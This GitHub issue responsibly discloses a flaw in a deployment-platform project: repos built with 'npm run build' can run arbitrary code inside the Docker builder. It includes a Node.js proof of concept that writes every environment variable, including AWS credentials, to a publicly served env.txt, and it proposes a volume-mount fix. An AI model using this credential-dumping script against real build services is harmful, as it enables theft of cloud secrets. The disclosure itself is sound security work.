Vulnerability of arbitrary code execution due to Docker's build scripts #18

@iamashay

Description

I want to point out a vulnerability that could compromise the Docker container and, as a result, leak your AWS credentials. The issue arises from the fact that this project runs "npm run build" inside the Docker container to build and upload any GitHub repo. An attacker can define a malicious script that executes when "npm run build" is invoked, allowing arbitrary code to run inside the Docker instance. This needed to be pointed out because I found people hosting this project on the web with their AWS credentials. I waited for them to take down their live deployments before posting this issue.

While this project is good for education, it shouldn't be hosted on the web unless these issues are addressed. Since this project is used by many students, I am writing down the steps to show how easy it is to compromise the Docker instance. I believe it would also be a good learning opportunity to figure out ways to solve this.

Details

  • The build server's script.js runs the build command defined in package.json via npm run build.
  • An attacker can create a GitHub repo whose package.json points the build script at a malicious file:
{
  "name": "demo",
  "version": "1.0.0",
  "scripts": {
    "build": "node server.js"
  }
}
  • The malicious script server.js can then dump all environment variables to a file that gets uploaded to S3:
const fs = require('fs');
const path = require('path');

// Define the output directory and file name
const outputDir = path.join(__dirname, 'dist');
const outputFile = path.join(outputDir, 'env.txt');

// Ensure the 'dist' directory exists
if (!fs.existsSync(outputDir)) {
  fs.mkdirSync(outputDir, { recursive: true });
}

// Get all environment variables
const envVariables = Object.entries(process.env)
  .map(([key, value]) => `${key}=${value}`)
  .join('\n');

// Write the environment variables to the file
fs.writeFile(outputFile, envVariables, (err) => {
  if (err) {
    console.error('Error writing to file:', err);
  } else {
    console.log(`Environment variables have been written to ${outputFile}`);
  }
});
  • env.txt would then be accessible from the hosted URL (subdomain.example.com/env.txt), exposing all environment variables, including the AWS credentials that were passed to the Docker instance for uploading repo files to S3.

Possible Solution:

A lot of ways exist to solve this issue. One option is to use the Docker container only to build the files, and to upload them to S3 from outside the container. This can be done using Docker's volume mount feature.
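A rough sketch of that approach (the image name, paths, and bucket name here are placeholders, not this project's actual values): the host mounts a local directory into the container, the build runs there without any AWS credentials in its environment, and the upload happens afterwards on the host.

```shell
# Run the untrusted build inside the container with NO AWS credentials
# in its environment. The host directory ./output is bind-mounted over
# the project's dist folder, so build artifacts land on the host.
docker run --rm \
  -v "$(pwd)/output:/home/app/dist" \
  builder-image \
  npm run build

# The upload runs on the host, where the credentials live; any malicious
# build script inside the container never sees them.
aws s3 sync ./output "s3://my-deploy-bucket/$PROJECT_ID/"
```

Even if the build script dumps its environment, the worst it can leak is the container's own (credential-free) environment, which defeats the attack described above.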

I implemented this solution in a similar project after watching @piyushgarg-dev's Vercel video. You can refer to my repo js-webhost for this.
